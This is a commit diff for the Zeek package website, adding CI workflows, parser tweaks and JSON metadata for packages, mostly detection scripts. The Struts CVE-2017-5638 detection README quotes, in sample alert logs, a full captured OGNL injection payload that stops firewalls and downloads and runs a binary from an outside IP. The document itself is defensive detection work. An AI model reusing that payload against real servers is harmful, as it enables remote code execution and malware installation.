Recreate

.github/workflows/build.yml

@@ -0,0 +1,26 @@
+# BUILDS AND RUNS DOCKER IMAGE
+name: Build
+
+on:
+  push:
+    branches:
+      # any branch
+      - '**'
+
+jobs:
+  test:
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Checkout
+      uses: actions/checkout@v4
+
+    - name: Build Docker Image
+      run: docker build -t zeek_website . --no-cache
+
+    - name: Start Docker Service
+      run: docker-compose up -d
+
+    - name: Stop Docker Service
+      run: docker-compose down
+

.github/workflows/pytest.yml

@@ -0,0 +1,31 @@
+# RUNS TEST SUITE
+name: Test Suite
+
+on:
+  push:
+    branches:
+      # any branch
+      - '**'
+
+jobs:
+  test:
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Checkout
+      uses: actions/checkout@v4
+
+    - name: Set up Python
+      uses: actions/setup-python@v4
+      with:
+        python-version: '3.10'
+
+    - name: Install dependencies
+      run: |
+        python -m pip install --upgrade pip
+        pip install -r requirements.txt
+
+    - name: Run Unit Tests
+      run: |
+        cd zeek-package-website && pytest -s --showlocals tests/test_parser.py 
+

README.md

@@ -1,3 +1,7 @@
+[![Build](https://github.com/zeek/package-website/actions/workflows/build.yml/badge.svg)](https://github.com/zeek/package-website/actions/workflows/build.yml)
+[![Test Suite](https://github.com/zeek/package-website/actions/workflows/pytest.yml/badge.svg)](https://github.com/zeek/package-website/actions/workflows/pytest.yml)
+[![license](https://img.shields.io/github/license/zeek/package-website?color=23228B22)](https://github.com/zeek/package-website/blob/main/LICENSE)
+
 # Zeek Package Website Repository
 ...
 

requirements.txt

@@ -12,3 +12,4 @@ fastapi_utils
 mistune
 markdown
 pytest
+requests

zeek-package-website/app/api/parser.py

@@ -60,33 +60,34 @@ def parse_data(self) -> dict:
 
             # extract our desired fields
             # TODO: pass in header + text to look for
-            self.author = self.get_line("credits", header)
-            self.description = self.get_line("description", header)
-            self.tags = self.get_line("tags", header)
-            self.version = self.get_line("version", header)
-            self.get_next("depends", header)
-            self.test_cmd = self.get_line("test_command", header)
-            self.build_cmd = self.get_line("build_command", header)
-            self.url = self.get_line("url", header)
-            self.summary = self.get_line("summary", header)
-            self.script_dir = self.get_line("script_dir", header)
-            self.plugin_dir = self.get_line("plugin_dir", header)
-            self.readme = self.get_readme()
+            self.author         = self.get_line("credits", header)
+            self.description    = self.get_line("description", header)
+            self.tags           = self.get_line("tags", header)
+            self.version        = self.get_line("version", header)
+            self.depends        = self.get_next("depends", header)
+            self.test_cmd       = self.get_line("test_command", header)
+            self.build_cmd      = self.get_line("build_command", header)
+            self.url            = self.get_line("url", header)
+            self.summary        = self.get_line("summary", header)
+            self.script_dir     = self.get_line("script_dir", header)
+            self.plugin_dir     = self.get_line("plugin_dir", header)
+            self.readme         = self.get_readme()
+
             if self.readme is not None and self.url is not None:
                 self.get_images()
 
             self.pkg_dict[self.section_header] = {
-                "description": self.description,
-                "tags": self.tags,
-                "version": self.version,
-                "depends": self.depends,
-                "test_cmd": self.test_cmd,
-                "build_cmd": self.build_cmd,
-                "url": self.url,
-                "summary": self.summary,
-                "script_dir": self.script_dir,
-                "plugin_dir": self.plugin_dir,
-                "readme": self.readme
+                "description"   : self.description,
+                "tags"          : self.tags,
+                "version"       : self.version,
+                "depends"       : self.depends,
+                "test_cmd"      : self.test_cmd,
+                "build_cmd"     : self.build_cmd,
+                "url"           : self.url,
+                "summary"       : self.summary,
+                "script_dir"    : self.script_dir,
+                "plugin_dir"    : self.plugin_dir,
+                "readme"        : self.readme
             }
 
 
@@ -95,8 +96,6 @@ def parse_data(self) -> dict:
 
         return self.pkg_dict
 
-
-
     def get_name(self) -> str:
         """
         @brief Finds all section headers in the file contents.
@@ -148,8 +147,8 @@ def get_next(self, text, header) -> list:
 
         if next_match:
             next_line = next_match.group(1).strip().split('\n')
-            # remove tabs
-            next_line = [ln.replace('\t', '') for ln in next_line]
+            # remove tabs and leading spaces
+            next_line = [ln.replace('\t', '').lstrip() for ln in next_line]
         else:
             next_line = None
 

zeek-package-website/app/api/search/json_files/Apple-RDP-net-assistant-DoS.git.json

@@ -0,0 +1 @@
+{"description": "udp-3283-DoS", "tags": "net_listerner, Apple RDP, udp DoS", "version": "master", "depends": null, "test_cmd": "( cd tests && btest -d )", "build_cmd": null, "url": "https://github.com/initconf/Apple-RDP-net-assistant-DoS.git", "summary": null, "script_dir": "scripts", "plugin_dir": null, "readme": "=================================================================================\nSimple policy to detect Apple 3283/udp DoS attack Candidate \n=================================================================================\n\nFollowing functionality are provided by the script\n--------------------------------------------------\n::\n        1) identifies spoofed traffic and subsiquent DNS amplification attack\n\t2) builds you a list of possible sources which are responding to 3283/udp DNS amplification attack with Apple RDP\n\nInstallation\n------------\n\tbro-pkg install bro/initconf/Apple-RDP-net-assistant-DoS\n\tor\n\t@load Apple-RDP-net-assistant-DoS/scripts \n\n\nDetailed Notes:\n---------------\n\nDetail Alerts and descriptions: Following alerts are generated by the script:\n******************************************************************************\n\nHeuristics  are simple: check for \n\nThis should generate following Kinds of notices:\n\n\nExample notice: \n***************************\n\nExample Summary Notice: \n***************************\n\n\n\n"}

zeek-package-website/app/api/search/json_files/BinaryHeap.json

@@ -0,0 +1 @@
+{"description": "Binary Heap Implementation", "tags": "zeek, zeek.org, BinaryHeap", "version": "master", "depends": null, "test_cmd": null, "build_cmd": null, "url": "https://github.com/jmellander/BinaryHeap", "summary": null, "script_dir": "scripts", "plugin_dir": null, "readme": "# BinaryHeap\n\nThe goal of this package is to provide a binary heap package for Zeek that can be used in multiple applications:\n\n\tPriority queue: can be efficiently implemented using a binary heap in O(logn) time.\n\tIncremental sorting: can be performed using a binary heap.\n\tOrder Statistics: efficiently find the kth smallest (or largest) elements in an array.\n\nThis implementation includes the following main functions:\nCreate Heap with compare function\n\tBuilt in MinHeap & MaxHeap functions\nAdd to Heap\nDelete from Heap\nModify Item in Heap\nReturn root of Heap\nPeek at root\nReplace root with new item and rebalance.\n\nAnd a number of utility functions\nSize of Heap\nReturn value of specific item by key\nDetermine if item by key is in Heap\n\nData structures & Functions\n\nBasic user item:\n\n```\ntype Item: record {\n    key: string &optional;\nval: double &optional;\n};\n```\n\nThe heap definition:\n\n```\ntype Heap: record {\nheap: table[count] of Item;     # The binary heap itself\n               idx: table[string] of count;    # map of key to location in binary heap\n               cmp: function(a: double, b:double): double;\n};\n```\n\nCreate a Heap:\n\n```\nInit: function(cmp: function(a: double, b:double): double): Heap;\n```\nThis function returns an empty Heap record, initialized.  cmp is the comparison function to determine whether to swap items.  Not usually used.\n \n```\nMinHeap: function(): Heap;\n```\nThis calls Init with an appropriate cmp() function that structures the Heap as a MinHeap.\n\n```\nMaxHeap: function(): Heap;\n```\nCreates a MaxHeap ala MinHeap\n\n```\nAdd: function(a: Heap, var: Item): bool;\n```\nAdds an Item to Heap, returns F if var$key already exists, T upon success\n\n```\nModify: function(a: Heap, var: Item): bool;\n```\nModifies an Item already in Heap to var$val, returns F if var$key doesn\u2019t exist, T upon success\n\n```\nUpdate:function(a: Heap, var: Item);\n```\nUpdates or adds an Item in heap.  If var$key exists, add var$item to current value,\nOtherwise add Item to Heap\n\n```\nDelete: function(a: Heap, var: Item): bool;\n```\nDelete Item var$key from Heap, var$val unused.  Return T is var$key was in Heap, otherwise F\n\n```\nPeek: function(a: Heap): Item;\n```\nReturns Item at root of Heap, without deleting from Heap, or empty Item if Heap is empty\n\n```\nRoot: function(a: Heap): Item;\n```\nReturns Item at root of Heap, and deletes it from Heap, or empty Item if Heap is empty\n\n```\nRootAndAdd: function(a: Heap, var: Item): Item;\n```\nThis function combines in an efficient way the Root() function, and the Add() function\n\n```\nIsIn: function(a: Heap, var: Item): bool;\n```\nReturns T or F depending on whether var$key is in the heap\n\n```\nSize: function(a: Heap): count;\n```\nReturns number of Items in Heap\n\n```\nValue: function(a: Heap, var: Item): Item;\n```\nReturns Item that corresponds to var$key, or empty Item if non-existant\n\n\nUsage Example\n\n```\nevent bro_init()\n\t{\n\t# Randomize\n\tsrand(double_to_count(time_to_double(current_time())));\n\n\t# Initialize a MinHeap\n\n\tlocal MyHeap = BinaryHeap::MaxHeap();\n\tlocal item:BinaryHeap::Item;\n\n\t# Lets add random values & keys\n\tlocal i=1000;\n\twhile (i > 0)\n\t\t{\n\t\titem = [$val=rand(100000) + 0.0, $key=md5_hash(rand(1000000))];\n\t\tBinaryHeap::Add(MyHeap, item);\n\t\t--i;\n\t\t}\n\n\t# Now print them out, highest first\n\twhile (BinaryHeap::Size(MyHeap) > 0)\n\t\t{\n\t\titem=BinaryHeap::Root(MyHeap);\n\t\tprint item;\n\t\t}\n\texit(0);\n\t}\n```\n\n\n"}

zeek-package-website/app/api/search/json_files/CVE-2017-5638_struts.json

@@ -0,0 +1 @@
+{"description": "package to detect CVE-2017-5638 struts attack", "tags": "CVE-2017-5638, struts", "version": "master", "depends": null, "test_cmd": null, "build_cmd": null, "url": "https://github.com/initconf/CVE-2017-5638_struts", "summary": null, "script_dir": "scripts", "plugin_dir": null, "readme": "I extended Scott Campbell's script further, made it more complicated :)\n\nWhile \"HTTP_StrutsAttack\" will stop 100% of the recon, there was still miniscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, vulnerable system might still do the wget included in the HTTP request and execute the malware. Since we aren't blocking the malware download IP in wget URL which is almost always a different one then recon IP.\n\nSo the extended script also extracts the malware download IP\n\n1) Generate the following notices:\n\n        redef enum Notice::Type += {\n                Attempt,\n                MalwareURL,\n                HostileDomainLookup,\n                MalwareURLClick,\n                FileDownload,\n                Compromise,\n        };\n\n\n- So now this script will extract the \"wget\" URL from Attempt and then if the URL has a domain (or cnamed domain) script will further track down the IP addresses of malware host and watch for activity.\n\n- if wget URL is seen in http, we'd generate a MalwareURLClick notice\n\n- further notices for FileDownload and Compromise.\n\n- This script is also clusterized.\n\nI ran it over 24 hours and things look stable with respect to script. I am still sure there might be some lame detection holes. so\n feel free to modify and let me know too.\n\nSurprisingly, unlike previous times, I don't see huge volume of Struts scanners. I am seeing in range of ~20's a day instead of ~1\n000's a day.\n\nHere is example notices:\n\n1489228734.171565       CbVq832QovIwAQddf2      1.24.191.108    65000   131.243.X.Y     80      -       -       -       tcp     Struts::Attempt CVE-2017-5638/Struts attack from 1.24.191.108 seen: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}  -       1.24.191.108    131.243.X.Y     80      -       worker-5        Notice::ACTION_LOG      3600.000000     F       -      --       -       -\n\n\n1489237401.399275       C90k4o1Zrn8D7vaXoe      124.117.244.34  49728   128.3.Y.Z       80      -       -       -       tcp     Struts::MalwareURL      Struts Hostile URLs seen in recon attempt 124.117.244.34 to 128.3.Y.Z with URL [http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;]    -       124.117.244.34  128.3.Y.Z       80      -       worker-13       Notice::ACTION_LOG      3600.000000     F       -       -       -       -       -\n\n\n\n1489240937.969456       CpUhgp1VJnPuOLY8h       128.3.X.Y       33755   121.42.249.245  1996    -       -       -       tcp     Struts::MalwareURLClick Struts Hostile URL seen 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx]   -       128.3.X.Y       121.42.249.245  1996    -       worker-15       Notice::ACTION_LOG      60.000000       F       -       -       -       -       -\n\n\n1489240937.969456       CpUhgp1VJnPuOLY8h       128.3.X.Y       33755   121.42.249.245  1996    -       -       -       tcp     Struts::Compromise      Struts compromise: 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx]        -       128.3.X.Y       121.42.249.245  1996    -       worker-15       Notice::ACTION_LOG      3600.000000     F       -       -       -       -       -\n\n\n1489240940.206456       CpUhgp1VJnPuOLY8h       128.3.X.Y       33755   121.42.249.245  1996    Frx9jZ1JkcrsVtgOkg      application/x-executable        http://121.42.249.245:1996/tcp/xhx      tcp     Struts::FileDownload    http://121.42.249.245:1996/tcp/xhx      http://121.42.249.245:1996/tcp/xhx      128.3.X.Y       121.42.249.245  1996    -       worker-15       Notice::ACTION_LOG      3600.000000     F\n"}

zeek-package-website/app/api/search/json_files/CVE-2020-16898-Bad-Neighbor.git.json

@@ -0,0 +1 @@
+{"description": "CVE-2020-16898: Bad Neighbor", "tags": "test_command = ( cd tests && btest -d )", "version": "master", "depends": null, "test_cmd": "( cd tests && btest -d )", "build_cmd": null, "url": "https://github.com/initconf/CVE-2020-16898-Bad-Neighbor.git", "summary": null, "script_dir": "scripts", "plugin_dir": null, "readme": "=================================================================================\nSimple policy to detect  CVE-2020-16898: Bad Neighbor\n=================================================================================\n\nFollowing functionality are provided by the script\n--------------------------------------------------\n::\n        1) Script checks on heuristic described here:\n\t\thttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/\n\nInstallation\n------------\n\tzeek-pkg install zeek/initconf/CVE-2020-16898-Bad-Neighbor\n\tor\n\t@load  CVE-2020-16898-Bad-Neighbor/scripts\n\n\nDetailed Notes:\n---------------\n\nDetail Alerts and descriptions: Following alerts are generated by the script:\n******************************************************************************\n\nHeuristics are simple:  \n\nAs per : \nhttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/\n\n(i) looking for packets with an ICMPv6 Type field of 134 indicating Router Advertisements \n(ii) an ICMPv6 Option field of 25 indicating Recursive DNS Server (RDNSS). \n(iii) If this RDNSS option also has a length field value that is even, the heuristic would drop or flag the associated packet, as it is likely part of a Bad Neighbor exploit attempt.\n\n\nExample notice: ICMP::BadNeighbor \n***************************\n\nExample Summary Notice: \n***************************\n\n\n\n"}